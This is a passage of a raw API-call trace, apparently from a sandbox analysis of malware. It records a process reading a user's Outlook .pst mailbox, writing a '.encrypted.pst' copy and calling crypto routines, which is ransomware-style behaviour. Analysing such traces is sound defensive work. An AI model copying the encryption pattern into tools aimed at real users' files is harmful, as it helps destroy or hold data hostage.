"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.713] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.713] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.encrypted.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.encrypted.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.714] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.714] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0036.717] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0036.718] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0036.720] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0036.721] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x2400, lpOverlapped=0x0) returned 1 [0036.721] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.726] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.726] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.726] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.727] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.729] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.729] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.729] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.729] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.729] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.729] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.729] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.729] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.729] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.730] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.732] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0036.732] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0036.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.734] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0036.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.734] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0036.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.734] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.735] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.735] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, 